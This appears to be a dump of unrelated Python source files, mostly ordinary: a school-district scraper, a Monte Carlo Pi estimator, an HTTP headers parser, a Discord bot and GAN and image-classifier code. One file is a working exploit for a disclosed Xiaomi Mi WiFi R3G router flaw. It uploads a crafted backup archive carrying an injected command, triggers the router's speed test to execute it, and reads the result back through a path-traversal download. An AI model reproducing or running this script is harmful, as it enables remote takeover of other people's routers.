        schoolnames.append(school['name'])
        # The '1' prefix presumably mirrors the site's numbering scheme — TODO confirm.
        resulet = spider_util.open_url(infourl_prefix + '1' + school['no'])
        bsObj = BeautifulSoup(resulet, "html.parser", from_encoding="utf-8")
        text = bsObj.select_one('#s_desc').get_text()
        print(text)
    print(schoolnames)
def coordinate_handle(areas, schooltype: str):
    """
    Convert each school's BD-09 coordinates to WGS-84 in place and tag the
    record with its school type.
    :param schooltype: label stored on each record; annotation corrected
        from `int` — callers pass strings like '小学' / '初中'.
    :param areas: list of school dicts (mutated in place)
    :return: None
    """
    for school in areas:
        point = school['point']  # Baidu (BD-09) "lon,lat" string
        bd_lon, bd_lat = coordinate_util.try_convert_float(*tuple(point.split(',')))
        lon_84, lat_84 = tuple(coordinate_util.bd09towgs84(bd_lon, bd_lat))
        school['bd_lon'] = bd_lon
        school['bd_lat'] = bd_lat
        school['lon_84'] = lon_84
        school['lat_84'] = lat_84
        school['schooltype'] = schooltype
        # Hand-corrected polygons for schools whose upstream data is wrong.
        if school['name'] == '水围小学':
            school[
                'polygon'] = '114.0633,22.534045;114.0634,22.52855;114.0628,22.521258;114.067507,22.521794;114.070507,' \
                             '22.522794;114.072412,22.524113;114.074029,22.525699;114.0746,22.527468;114.0746,' \
                             '22.5288;114.07106,22.5287;114.069627,22.5342 '
        if school['name'] == '皇岗中学':
            school['polygon'] = '114.06335630432059,22.53407055006403;114.0633570352742,' \
                                '22.52892505079072;114.06346863640744,22.528256298155046;114.06333038826526,' \
                                '22.526891409780625;114.06318181142706,22.5246178427583;114.0630325230082,' \
                                '22.522394809728347;114.0629434046132,22.521333587742063;114.06877342108848,' \
                                '22.522389967130895;114.07232486225952,22.524357038565782;114.0730238399688,' \
                                '22.524157289190093;114.07402998731851,22.523322509788134;114.07466511847029,' \
                                '22.52267052672166;114.0759830451113,22.520432070153596;114.08186917875757,' \
                                '22.52170881191117;114.08102355412635,22.524914183231346;114.08252321508871,' \
                                '22.52897097054742;114.07943882066171,22.52999201450642;114.07946277559604,' \
                                '22.532391529886656;114.07942632794372,22.53438421673346;114.06335630432059,' \
                                '22.53407055006403 '
        if school['name'] == '福田外国语学校南校区初中部(暂定名)':
            school['polygon'] = '114.0629360257067,22.520920473399144;114.0625158974266,' \
                                '22.519362397148825;114.06309218401087,22.516947467537996;114.06331627482768,' \
                                '22.515890636312466;114.06516390653805,22.50671939281994;114.0676961580645,' \
                                '22.508769379251227;114.06818119507018,22.513321296078516;114.06972362173309,' \
                                '22.515887848366944;114.07575038062822,22.52053043740426;114.0744486351297,' \
                                '22.522618348565825;114.07362632561198,22.52301515156071;114.07263319972233,' \
                                '22.523825098839897;114.0708162964302,22.522876576538774;114.06798413768293,' \
                                '22.521646582687115;114.06289448830186,22.520957749246804;114.0629360257067,' \
                                '22.520920473399144 '
        polygon = school['polygon']
        if not polygon:
            # No boundary available: record it explicitly and move on.
            school['polygon_84'] = None
            continue
        points_in_polygon_list = polygon.split(';')
        points_wgs84 = []
        for point_bd in points_in_polygon_list:
            if point_bd is None or point_bd == '':
                continue
            lon, lat = tuple(coordinate_util.try_convert_float(*point_bd.split(',')))
            data = coordinate_util.bd09towgs84(lon, lat)
            point_wgs84 = ','.join(str(s) for s in data if s)
            points_wgs84.append(point_wgs84)
        # Close the ring: repeat the first coordinate at the end.
        # NOTE(review): raises IndexError if the polygon string held no
        # usable points — confirm upstream data guarantees at least one.
        points_wgs84.append(points_wgs84[0])
        polygon_wgs84_str = ';'.join(points_wgs84)  # converted boundary string
        school['polygon_84'] = polygon_wgs84_str
def main():
    """Crawl the district data and export it as both Excel and JSON."""
    datas = areaSnatch()
    DataFrame(datas).to_excel('D:\\pypy\\pythonresult\\edu\\学区信息.xls', index=False)
    DataFrame(datas).to_json('D:\\pypy\\pythonresult\\edu\\学区信息.json', orient='records', force_ascii=False)
if __name__ == '__main__':
main()
|
986,970 | 20fdba5455acba89837283590aba51913b46b77c | #!/usr/bin/env
# -*- coding:utf-8 -*-
"""
Derive Pi by Monte Carlo method
version 1
I am gonna use nulti-threading.
- Sam Sun <sunjunjian@gmail.com>, 2012
"""
import random
import time
import threading
import io
# import timeit
class Counter:
    """Accumulates Monte Carlo sample counts and derives the Pi estimate."""
    def __init__(self):
        self.total_number = 0   # total points sampled
        self.inside_number = 0  # points that fell inside the quarter circle
        self.mcpi = 0           # last computed estimate of Pi
    def reset(self):
        # Clear all counters before a new run.
        self.total_number = 0
        self.inside_number = 0
        self.mcpi = 0
    def add(self, total, inside):
        # Fold one worker batch into the running totals.
        self.total_number += total
        self.inside_number += inside
    def getPi(self):
        # Pi ~= 4 * inside/total; guard against division by zero.
        if self.total_number != 0:
            self.mcpi = 4 * (float(self.inside_number) / float(self.total_number))
        else:
            self.mcpi = 0
        return self.mcpi
    def display(self):
        print 'Monte Carlo Pi is : ', self.getPi()
def worker(num_loops, cnt):
    """ The worker, invoked in a manager.
    'num_loops' - the number of loops we want to perform the Monte Carlo
    simulations, with unit in thousand.
    'cnt' - the object where we store the counters.
    """
    global mutex
    for i in range(num_loops):
        total = 0
        inside =0
        # Sample 1000 random points in the unit square per loop.
        for j in range(1000):
            x = random.random()
            y = random.random()
            if (x*x + y*y) <= 1:
                inside += 1
            total += 1
        # Fold this batch into the shared counter under the lock.
        mutex.acquire()
        cnt.add(total, inside)
        mutex.release()
def manager(num_thrds, num_loops):
    """ The manager function spawns workers.
    'num_thrds' - the number of workers.
    'num_loops' - the number of loops we want to perform the Monte Carlo
    simulations, with unit in thousand.
    """
    # Reset the shared counters before the run.
    mutex.acquire()
    cnt.reset()
    mutex.release()
    # initialize the thread pool
    thread_pool = []
    for i in range(num_thrds):
        thrd = threading.Thread(target=worker, args=(num_loops, cnt))
        thread_pool.append(thrd)
    # start threads
    for i in range(len(thread_pool)):
        thread_pool[i].start()
    # Wait for every worker to finish before returning.
    for i in range(len(thread_pool)):
        threading.Thread.join(thread_pool[i])
    #cnt.display()
if __name__ == "__main__":
global mutex
# initialize the mutex
mutex = threading.Lock()
# initialize the result Counter
cnt = Counter()
# number of threads to be used
num_thrds = 4
# LCM is used to distribute workload among workers
LCM = 840
# output
lines = []
for i in range(1,num_thrds + 1):
start = time.time()
manager(i, LCM/i)
elapsed = (time.time() - start)
# need to make sure lines are Unicode chars
lines.append(repr(cnt.getPi()) + u',' + repr(i) + u',' + repr(LCM * 1000) + u',' + repr(elapsed) + u'\n')
with io.open('python.out', 'w') as file:
# writelines method only takes Unicode (no string)
file.writelines(lines)
|
986,971 | e83e7730ed9f4b12d05dec35ed9bcf2498a3ce61 | from collections import OrderedDict
from typing import Union, Mapping, Dict
class Headers(OrderedDict):
    """Ordered mapping of HTTP headers with wire-format (de)serialization.

    Bug fixes: __bool__ and __repr__ both referenced the nonexistent
    attribute ``self.headers`` and raised AttributeError; they now operate
    on the mapping itself.
    """
    @classmethod
    def from_bytes(cls, b: bytes):
        """Parse raw header bytes (up to the first blank line) into Headers.

        Repeated fields are folded into one comma-separated value
        (per RFC 2616); purely numeric values are stored as int.
        """
        if b'\r\n\r\n' in b:
            b = b[:b.find(b'\r\n\r\n')]
        headers: Dict[str, Union[str, int]] = Headers()
        for line in b.split(b'\r\n'):
            if b':' in line:
                header, *value = line.split(b':', maxsplit=1)
                if not value:
                    continue
                header_str, value_str = \
                    header.decode().strip(), value[0].decode().strip()
                if header_str in headers.keys():
                    # Multiple message-header fields
                    # According to RFC 2616
                    headers[header_str] = \
                        str(headers[header_str]) + ',' + value_str
                elif value_str.isdigit():
                    value_int = int(value_str)
                    headers[header_str] = value_int
                else:
                    headers[header_str] = value_str
        return headers
    def to_str(self):
        """Serialize back to wire format, terminated by a blank line."""
        s = '\r\n'.join(
            [
                f'{key}: {value}'
                for key, value in self.items()
            ]
        )
        s += '\r\n\r\n'
        return s
    def to_bytes(self):
        """UTF-8-encoded wire-format serialization."""
        return self.to_str().encode()
    def __bool__(self):
        # Fixed: truthiness reflects whether any header is set.
        return len(self) > 0
    def __repr__(self):
        # Fixed: show the stored mapping.
        return f'{self.__class__.__name__}({dict(self)})'
    def __init__(self, headers: Mapping = dict()):
        # The default mapping is only read, never mutated, so sharing it is
        # safe; entries are copied into self.
        for key, value in headers.items():
            self[key] = value
|
986,972 | 850d02bbf7d3fffcb1dbb60fbb6dae0daec46bb3 | from rest_framework import routers
from .viewsets import ToDoViewSet
# Single DRF router exposing the ToDo API under the 'todo' URL prefix.
router = routers.DefaultRouter()
router.register('todo', ToDoViewSet, basename='todo')
|
986,973 | 73fc6d860bf293d4dfaeeadae0a0ba754832f966 | import os
# Required environment configuration; a missing variable raises KeyError at
# import time so misconfiguration fails fast.
APIARY_URL = os.environ['APIARY_URL']
KEY = os.environ['OPS_KEY']
SECRET = os.environ['OPS_SECRET']
|
986,974 | 3ffb072f7d70402025aa628a437c6cf5c9d85c0b | # based on the idea from
# https://github.com/andsens/bootstrap-vz/blob/5250f8233215f6f2e3a571be2f5cf3e09accd4b6/docs/transform_github_links.py
#
# Copyright 2013-2014 Anders Ingemann <anders@ingemann.de>
# Copyright 2016 Darragh Bailey <dbailey@hpe.com>
from docutils import nodes
import os.path
def transform_github_links(app, doctree, fromdocname):
    """Convert file references for github to correct target

    Scans the doctree for links directly referencing ReSTructured
    text documents within this repository. It converts these links
    to a suitable target for sphinx generated docs.

    Such references as <file>.rst are used by source code hosting
    sites such as GitHub when rendering documents directly from
    individual source files without parsing the entire doctree.

    However referencing the original <file>.rst is not useful for
    sphinx generated documentation as <file>.rst will not exist in
    the resulting documentation as it will also have been converted
    to the chosen format e.g. <file>.html

    Supporting automatic conversion ensures that GitHub/BitBucket
    and any other git hosting site performing rendering on a file
    by file basis allowing users to navigate through the documentation,
    while still ensuring the output from fully generated sphinx docs
    will point to the correct target.
    """
    try:
        target_format = app.builder.link_suffix
    except AttributeError:
        # if the builder has no link_suffix, then no need to modify
        # the current links.
        return

    # Sphinx's source_suffix config may be a single string or a collection;
    # normalize to a list so iteration never walks over single characters.
    source_suffix = app.config.source_suffix
    if isinstance(source_suffix, str):
        source_suffixes = [source_suffix]
    else:
        source_suffixes = list(source_suffix)

    # Links are either absolute against the repository or relative to
    # the current document's directory. Note that this is not
    # necessarily app.srcdir, which is the documentation root
    # directory. Instead rely on 'source' attribute of doctree to
    # identify the path of the file providing the current doctree
    try:
        doc_path = doctree.attributes['source']
        doc_dir = os.path.dirname(doc_path)
    except KeyError:
        # some doctrees added by other libraries through dynamic
        # generation do not have a source file. Assume paths are
        # relative to the repo.
        doc_dir = ""

    for node in doctree.traverse(nodes.reference):
        if 'refuri' not in node:
            continue
        if node['refuri'].startswith('http'):
            continue
        try:
            link, anchor = node['refuri'].split('#', 1)
            anchor = '#' + anchor
        except ValueError:
            link = node['refuri']
            anchor = ''
        # Replace the suffix with the correct target format file ending,
        # but only if the link ends with a source suffix and refers to a
        # local file.
        for src_suffix in source_suffixes:
            if link.endswith(src_suffix):
                # absolute paths are considered relative to repo
                if link.startswith("/"):
                    basepath = ""
                # relative paths are against the current doctree source path
                else:
                    basepath = doc_dir
                if os.path.exists(os.path.join(basepath, link)):
                    # Bug fix: previously sliced with len(source_suffix)
                    # (the whole config value) instead of the matched suffix,
                    # chopping the wrong number of characters when the config
                    # was a list.
                    node['refuri'] = (link[:-len(src_suffix)] + target_format +
                                      anchor)
                    # One rewrite per node is enough.
                    break
def setup(app):
    """Sphinx extension entry point: register the doctree-resolved hook."""
    app.connect('doctree-resolved', transform_github_links)
    metadata = {'version': '0.1'}
    return metadata
|
986,975 | 47dfe408c7ad29758b4a3839e28fab22262b3cbf | # Sample Bar Graph- Generates A Bar Graph Of Sample Data
import matplotlib.pyplot as plt # Import Matplotlib
import numpy as np # Import Numpy
# Plotting Data
# Plotting Data: five schools and their student populations.
schl_names = ("Ravenna HS", "Theodore Roosevelt HS", "Hoover HS", "McKinley HS", "Stow-Munroe Falls HS")
population = [930, 1300, 1700, 900, 2000] # Population of schools
x_values = np.arange(len(schl_names)) # Arrange - Evenly spaced bars
def bar_graph (): # Generates a bar graph of the sample data
    # Align - Alignment of bars; the color is a dark-red hex value.
    plt.bar (x_values, population, align = 'center', color = '#a93226')
    plt.xticks (x_values, schl_names, fontsize = 7)
    plt.title ("Population Of Schools") # Sets Title
    plt.show()
bar_graph ()
|
986,976 | b4a823f1ae7a798b24a8c3d78b7b0cc0e7c612fa | # Generated by Django 2.0.5 on 2020-02-25 06:13
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: relax plusplans.priority to allow NULL and blank."""
    dependencies = [
        ('plus', '0060_auto_20200224_1449'),
    ]
    operations = [
        migrations.AlterField(
            model_name='plusplans',
            name='priority',
            field=models.PositiveIntegerField(blank=True, default=0, null=True),
        ),
    ]
|
986,977 | b888cb5cdf7db25ba7056eed2d2f640088b3312c | from quantdsl.semantics import Add, Choice, Fixing, Market, Min, Mult, Wait, inline
def PowerPlant(start, end, commodity, cold, step):
if (start < end):
Wait(start, Choice(
Add(
PowerPlant(start + step, end, commodity, Running(), step),
ProfitFromRunning(start, commodity, cold)
),
PowerPlant(start + step, end, commodity, Stopped(cold), step),
))
else:
return 0
@inline
def Running():
    # Running state: no cold-start penalty.
    return 0
@inline
def Stopped(cold):
    # Being stopped increases coldness, capped at 2.
    return Min(2, cold + 1)
@inline
def ProfitFromRunning(start, commodity, cold):
    # Profit is reduced by 10% per unit of coldness, fixed at time `start`.
    return Mult((1 - cold / 10), Fixing(start, Burn(commodity)))
@inline
def Burn(commodity):
    # Burning maps directly to the commodity's market price.
    return Market(commodity)
|
986,978 | 84e18900d8cd5f4cffbf23762d15d4a5ec5380ef | from flask import render_template
from . import scores
from . import spec
def configure(config, bp, score_processor):
    """Attach the v1 index route plus the scores and spec routes to `bp`."""
    @bp.route("/v1/", methods=["GET"])
    def v1_index():
        # Swagger UI landing page pointing at the generated spec endpoint.
        return render_template("swagger-ui.html", swagger_spec="/v1/spec/")
    bp = scores.configure(config, bp, score_processor)
    bp = spec.configure(config, bp, score_processor)
    return bp
|
986,979 | 6583c727754f9b23992aa399baf774c5fd8c3d55 | #Discord
import discord
from discord.ext import commands
import pandas as pd
import random
#Token
from tokens import token
# Client
client = commands.Bot(command_prefix='%')
#Functions
#Commands
@client.command(name='version')
async def version(context):
    """Reply with an embed describing the bot's current version."""
    emb=discord.Embed(title="Current Version", description="Version of the bot is 1.0", color=0x00ff00)
    emb.add_field(name="Version Code:", value="v1.0.1", inline=False)
    emb.add_field(name="Date Released:", value="20/02/21", inline=False)
    emb.set_footer(text="Version")
    emb.set_author(name="Ruben Romero")
    await context.message.channel.send(embed=emb)
@client.command(name='kick', pass_context=True)
@commands.has_permissions(kick_members=True)
async def kick(context, member: discord.Member):
    """Kick `member` from the guild (requires the kick_members permission)."""
    await member.kick()
    # Fix: the confirmation message was missing a space before "has".
    await context.send('User '+member.display_name+' has been kicked')
@client.command(name='ban', pass_context=True)
# NOTE(review): this checks kick_members, not ban_members — confirm intended.
@commands.has_permissions(kick_members=True)
async def ban(context, member: discord.Member, *, reason=None):
    """Ban `member`, forwarding the optional reason to the audit log.

    Fixes: `reason` was accepted but never passed to member.ban(), and the
    confirmation message was missing a space before "has".
    """
    await member.ban(reason=reason)
    await context.send('User '+member.display_name+' has been banned')
@client.command(name='dm')
async def dm(context):
    """Send the invoking user a direct message."""
    author = context.message.author
    await author.send("Hi! Did you ask for a DM?")
@client.command(name='img')
async def img(context):
    """Post the bundled santiago.jpeg image in the current channel."""
    attachment = discord.File("InosukeBot/santiago.jpeg")
    await context.channel.send(file=attachment)
#Events
@client.event
async def on_ready():
    """Announce startup in the config channel and set the bot's presence."""
    greeting_channel = client.get_channel(812579716161994802)
    await greeting_channel.send('Hola zorras!')
    await client.change_presence(
        status=discord.Status.do_not_disturb,
        activity=discord.Game('Fcking around'),
    )
@client.event
async def on_message(message):
    """Global message hook: meme-reply to one user, append to the CSV on 'Append'.

    Must end by forwarding to process_commands, otherwise no %commands would run.
    """
    if message.author.id == 725560073266659351:
        await message.channel.send(file=discord.File("InosukeBot/santiago.jpeg"))
    if message.content == 'Append':
        df = pd.read_csv('C:/Users/ruben/Documents/Inosuke Bot/InosukeBot/data.csv', index_col=0)
        # Bug fix: DataFrame.append was deprecated in pandas 1.4 and removed in
        # 2.0; pd.concat is the supported equivalent.
        df = pd.concat([df, pd.DataFrame([{"A": 'New message to append'}])], ignore_index=True)
        df.to_csv('C:/Users/ruben/Documents/Inosuke Bot/InosukeBot/data.csv')
    await client.process_commands(message)
@client.event
async def on_disconnect():
    """Post a goodbye message in the config channel when the gateway drops."""
    farewell_channel = client.get_channel(812579716161994802)
    await farewell_channel.send('Aios perras')
# Run client: blocks here, connecting to the Discord gateway with the token
# imported from tokens.py.
client.run(token)
|
986,980 | 55a84f1d21f7d28e740083b94bc878c391e166df | #!/usr/bin/python
# There is a remote command execution vulnerability in Xiaomi Mi WiFi R3G before version stable 2.28.23.
# The backup file is in tar.gz format. After uploading, the application uses the tar zxf command to decompress,
# so you can control the contents of the files in the decompressed directory.
# In addition, the application's sh script for testing upload and download speeds will read the url list from /tmp/speedtest_urls.xml,
# and there is a command injection vulnerability.
# discoverer: UltramanGaia from Kap0k & Zhiniang Peng from Qihoo 360 Core Security
import os
import tarfile
import requests
# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}
## get stok: the per-session auth token taken from the router web UI URL
stok = input("stok: ")
## make config file: the command is substituted into the speedtest URL template
command = input("command: ")
speed_test_filename = "speedtest_urls.xml"
with open("template.xml","rt") as f:
    template = f.read()
data = template.format(command=command)
# print(data)
with open("speedtest_urls.xml",'wt') as f:
    f.write(data)
# Pack the crafted XML; the router extracts uploads with `tar zxf`, so the
# extracted file contents are fully attacker-controlled.
with tarfile.open("payload.tar.gz", "w:gz") as tar:
    # tar.add("cfg_backup.des")
    # tar.add("cfg_backup.mbu")
    tar.add("speedtest_urls.xml")
## upload config file
print("start uploading config file ...")
r1 = requests.post("http://192.168.31.1/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(stok), files={"image":open("payload.tar.gz",'rb')}, proxies=proxies)
# print(r1.text)
## exec download speed test: the speed-test script reads /tmp/speedtest_urls.xml
## and shells out, executing the injected command
print("start exec command...")
r2 = requests.get("http://192.168.31.1/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(stok), proxies=proxies)
# print(r2.text)
## read result file via the path-traversal download endpoint (extdisks../)
r3 = requests.get("http://192.168.31.1/api-third-party/download/extdisks../tmp/1.txt", proxies=proxies)
if r3.status_code == 200:
    print("success, vul")
    print(r3.text)
|
986,981 | 2f8065ac849e3d7e96e7fb2616f5a0163f69fa63 | import matplotlib.pyplot as plt
import torch
from torch import nn
import torch.nn.functional as F
# define the class for the CNN-classifier
class CNN(nn.Module):
    """Two-block convolutional classifier for 28x28 single-channel images (10 classes)."""

    def __init__(self):
        super(CNN, self).__init__()
        # Block 1: (N, 1, 28, 28) -> (N, 16, 14, 14)
        self.conv1 = nn.Sequential(
            nn.Conv2d(1, 16, 5, 1, 2),
            nn.ReLU(),
            nn.MaxPool2d(2),
        )
        # Block 2: (N, 16, 14, 14) -> (N, 32, 7, 7)
        self.conv2 = nn.Sequential(
            nn.Conv2d(16, 32, 5, 1, 2),
            nn.ReLU(),
            nn.MaxPool2d(2),
        )
        # Linear head over the flattened feature map.
        self.out = nn.Sequential(
            nn.Linear(32 * 7 * 7, 10),
        )

    def forward(self, x):
        features = self.conv2(self.conv1(x))
        flat = features.view(features.size(0), -1)  # (N, 32 * 7 * 7)
        return self.out(flat)
# choose CNN-classifier-model:
trained_Classifier = "trained models/CNN-Classifier_MNIST.pth" # test accuracy: 99.11%
#trained_Classifier = "trained models/CNN-Classifier_FashionMNIST.pth" # test accuracy: 89.96%
# NOTE(review): torch.load of a whole model object unpickles arbitrary code
# and needs the CNN class above in scope - only load trusted checkpoints.
C = torch.load(trained_Classifier)
# load cGAN
# Hyperparameters:
label_knots = 64      # number of knots the label gets mapped to in both G and D
G_in_eval = False     # if G is set to eval mode during inference
uniform_input = False # if True: random input sampled from a uniform distribution, else: normal distribution
G_noise = 0           # add noise to G layers, has to be commented in in the rest of the code
# fixed Hyperparameters
batch_size = 100
pDropout = 0.5        # Dropout percentage
scale = 0.2           # scale for leaky ReLU
pic_knots = 512 - label_knots  # noise branch width so both branches sum to 512
# define the class for the Generator
# define the class for the Generator
class Gen(nn.Module):
    """Conditional generator: (noise[100], one-hot label[10]) -> flat 784 image in [-1, 1]."""
    def __init__(self):
        super(Gen, self).__init__()
        # separate input branches for the noise vector and the label
        self.fc1_1 = nn.Linear(100, pic_knots)
        self.fc1_1_bn = nn.BatchNorm1d(pic_knots)
        self.fc1_2 = nn.Linear(10, label_knots)
        self.fc1_2_bn = nn.BatchNorm1d(label_knots)
        self.dropout1 = nn.Dropout(p=pDropout)
        self.fc2 = nn.Linear(512, 512)
        self.fc2_bn = nn.BatchNorm1d(512)
        self.dropout2 = nn.Dropout(p=pDropout)
        self.fc3 = nn.Linear(512, 784)
        self.fc3_bn = nn.BatchNorm1d(784)
    def forward(self, input, label):
        # process noise and label separately, then concatenate
        # (pic_knots + label_knots = 512)
        x1 = F.leaky_relu(self.fc1_1_bn(self.fc1_1(input)), negative_slope=scale)
        x2 = F.leaky_relu(self.fc1_2_bn(self.fc1_2(label)), negative_slope=scale)
        x = torch.cat([x1, x2], 1)
        #x = x + G_noise * torch.randn(1, 512, dtype=torch.float) # additional random noise
        x = self.dropout1(x)
        #x = F.dropout(x, pDropout)
        x = F.leaky_relu(self.fc2_bn(self.fc2(x)), negative_slope=scale)
        #x = x + G_noise * torch.randn(1, 512, dtype=torch.float) # additional random noise
        x = self.dropout2(x)
        #x = F.dropout(x, pDropout)
        # tanh bounds outputs to [-1, 1], matching the rescaled training data
        output = torch.tanh(self.fc3_bn(self.fc3(x)))
        #output = torch.sigmoid(self.fc3_bn(self.fc3(x))) # deactivate data rescaling in train and loop
        return output
# define the class for the Discriminator
# define the class for the Discriminator
class Dis(nn.Module):
    """Conditional discriminator: (image[784], one-hot label[10]) -> real/fake probability."""
    def __init__(self):
        super(Dis, self).__init__()
        self.flatten = nn.Flatten()
        # separate input branches for the image and the label
        # (no BatchNorm in D - the commented lines were deliberately disabled)
        self.fc1_1 = nn.Linear(784, pic_knots)
        #self.fc1_1_bn = nn.BatchNorm1d(pic_knots)
        self.fc1_2 = nn.Linear(10, label_knots)
        #self.fc1_2_bn = nn.BatchNorm1d(label_knots)
        self.dropout1 = nn.Dropout(p=pDropout)
        self.fc2 = nn.Linear(512, 512)
        #self.fc2_bn = nn.BatchNorm1d(512)
        self.dropout2 = nn.Dropout(p=pDropout)
        self.fc3 = nn.Linear(512, 1)
    def forward(self, input, label):
        input = self.flatten(input)
        x1 = F.leaky_relu(self.fc1_1(input), negative_slope=scale)
        x2 = F.leaky_relu(self.fc1_2(label), negative_slope=scale)
        x = torch.cat([x1, x2], 1)  # pic_knots + label_knots = 512
        x = self.dropout1(x)
        #x = F.dropout(x, pDropout)
        x = F.leaky_relu(self.fc2(x), negative_slope=scale)
        x = self.dropout2(x)
        #x = F.dropout(x, pDropout)
        # sigmoid: probability that the (image, label) pair is real
        output = torch.sigmoid(self.fc3(x))
        return output
# load a cGAN-model (commented paths are alternative checkpoints to toggle):
# MNIST
#trained_cGAN = "trained models/cGAN/cGAN_model6.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model7.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model8.pth"
trained_cGAN = "trained models/cGAN/cGAN_model9.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model10.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model11.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model12.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model13.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model14.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model15.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model16.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model17.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model18.pth"
# FashionMNIST
#trained_cGAN = "trained models/cGAN/cGAN_model19.pth"
#trained_cGAN = "trained models/cGAN/cGAN_model20.pth"
# the checkpoint stores a (Generator, Discriminator) tuple; only G is needed here
(G, _) = torch.load(trained_cGAN)
# to make sure that test set is always 10.000:
epochs = 10000//batch_size
# GAN-test: generate labeled fakes and check whether the pretrained classifier C
# assigns the same label the generator was conditioned on.
print("Testing...")
C.eval()
if G_in_eval == True:
    G.eval()
else:
    G.train()  # keep BatchNorm/Dropout in training mode while sampling
total = 0
correct = 0
with torch.no_grad():
    for k in range(epochs): # same size as test set MNIST
        if uniform_input == True:
            x_rand = torch.rand(batch_size, 100, dtype=torch.float) # uniform
        else:
            x_rand = torch.randn(batch_size, 100, dtype=torch.float) # normal
        # one-hot encode a random target digit per sample
        rand_label = torch.zeros(batch_size, 10, dtype=torch.float)
        rand = torch.randint(low=0, high=10, size=(batch_size, 1))
        for i in range(batch_size):
            rand_label[i, rand[i, 0].item()] = 1
        fake_images = torch.reshape(G(x_rand, rand_label), (batch_size, 1, 28, 28))
        guess = C(fake_images)
        classification = torch.argmax(guess.data, 1)
        total += batch_size
        for i in range(batch_size):
            if rand[i, 0].item() == classification[i].item():
                correct += 1
accuracy = correct/total * 100
print("Test Accuracy on fake images (GAN-test):", accuracy, "%")
# show 25 images with CNN-classification in the title
plt.figure(0)
if uniform_input == True:
    x_rand = torch.rand(25, 100, dtype=torch.float) # uniform
else:
    x_rand = torch.randn(25, 100, dtype=torch.float) # normal
rand_label = torch.zeros(25, 10, dtype=torch.float)
rand = torch.randint(low=0, high=10, size=(25, 1))
for i in range(25):
    rand_label[i, rand[i, 0].item()] = 1
fake_images = torch.reshape(G(x_rand, rand_label), (25, 1, 28, 28))
classifications = C(fake_images)
(_, numbers) = torch.max(classifications, 1)
for i in range(25):
    # title shows "classifier guess" + "conditioning label"
    title = str(numbers[i].item()) + "label:" + str(rand[i, 0].item())
    fake_image = torch.reshape(fake_images[i, :, :, :], (28, 28))
    plt.subplot(5, 5, i + 1)
    plt.axis('off') # deletes axis from plots
    plt.gca().set_title(title)
    plt.imshow(fake_image.detach(), cmap='gray') # gray_r for reversed grayscale
plt.show()
# show 100 images, 10 of each class in one row (label = row index i//10)
plt.figure("Overview")
if uniform_input == True:
    x_rand = torch.rand(100, 100, dtype=torch.float) # uniform
else:
    x_rand = torch.randn(100, 100, dtype=torch.float) # normal
rand_label = torch.zeros(100, 10, dtype=torch.float)
for i in range(100):
    rand_label[i, i//10] = 1
fake_images = G(x_rand, rand_label)
fake_images = torch.reshape(fake_images, (100, 1, 28, 28))
classification = C(fake_images)
(_, number) = torch.max(classification, 1)
for i in range(100):
    fake_image = torch.reshape(fake_images[i, :, :, :], (28, 28))
    plt.subplot(10, 10, i + 1)
    plt.axis('off')
    title = str(number[i].item()) + "label:" + str(i//10)
    #plt.gca().set_title(title) # add classification and label to each picture
    plt.imshow(fake_image.detach(), cmap='gray') # gray_r for reversed grayscale
plt.show()
|
986,982 | 46ad8e2793b7f8e57eb839ad0d87f7123f2d6b59 | #!/usr/bin/env python
# coding: utf-8
# In[2]:
from __future__ import print_function, division
import matplotlib.pyplot as plt
import random
import numpy as np
import cv2
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
import os
import urllib.request as urllib2
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
import torchvision
from torchvision import datasets, models, transforms
from torchvision.datasets import ImageFolder
import time
import copy
import sys
# In[23]:
# The 20 Pascal-VOC object classes, in the index order the classifier head was
# trained with (NOT alphabetical).
classes = ('aeroplane','bicycle','diningtable',
'dog','horse','motorbike','person','pottedplant','sheep','sofa','train','tvmonitor',
'bird','boat','bottle','bus','car','cat','chair','cow')
# In[ ]:
# Inference-time preprocessing: resize to the network input size and normalize
# with the standard ImageNet channel statistics.
data_transforms = {
    'test': transforms.Compose([
        transforms.Resize((224,224)),
        transforms.ToTensor(),
        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
    ])
}
# In[4]:
class SAVE_IMAGE:
    """Lay out images on an ncols x nrows matplotlib grid and save/show the figure.

    Images are added left-to-right, top-to-bottom via addImage().
    NOTE(review): the figure is sized from the module-global CV2_IMG, which must
    be set (see GetBoundingBox / R_CNN) before instantiating.
    """
    def __init__(self, ncols = 0, nrows = 0, figTitle=""):
        if ncols == 0 or nrows == 0:
            raise ValueError("ncols and nrows must be initialize")
        dpi = 80
        height, width, depth = CV2_IMG.shape
        # size each cell to the base image's pixel dimensions
        figsize = width / float(dpi) * ncols , height / float(dpi) * nrows
        self.fig, self.ax = plt.subplots(ncols = ncols, nrows = nrows, figsize=figsize)
        self.ncols = ncols
        self.nrows = nrows
        # Bug fix: the original used `figTitle is not ""`, which compares object
        # identity, not string equality (a SyntaxWarning on CPython >= 3.8).
        if figTitle != "":
            self.fig.suptitle(figTitle, fontsize=20)
        # cursor of the next free cell (current col / current row)
        self.ccols = 0
        self.crows = 0
    def addImage(self, img, title = ""):
        """Place `img` (with optional per-cell title) in the next free cell."""
        # plt.subplots returns a bare Axes for 1x1, a 1-D array for a single
        # row, and a 2-D array otherwise - index accordingly.
        if self.nrows == 1:
            if self.ncols == 1:
                self.ax.imshow(img)
                self.ax.set_title(title, fontsize=15)
            else:
                self.ax[self.ccols].imshow(img)
                self.ax[self.ccols].set_title(title, fontsize=15)
        else:
            self.ax[self.crows][self.ccols].imshow(img)
            self.ax[self.crows][self.ccols].set_title(title, fontsize=15)
        # advance the cursor, wrapping to the next row at the end of a row
        if self.ccols+1 == self.ncols:
            self.crows = self.crows + 1
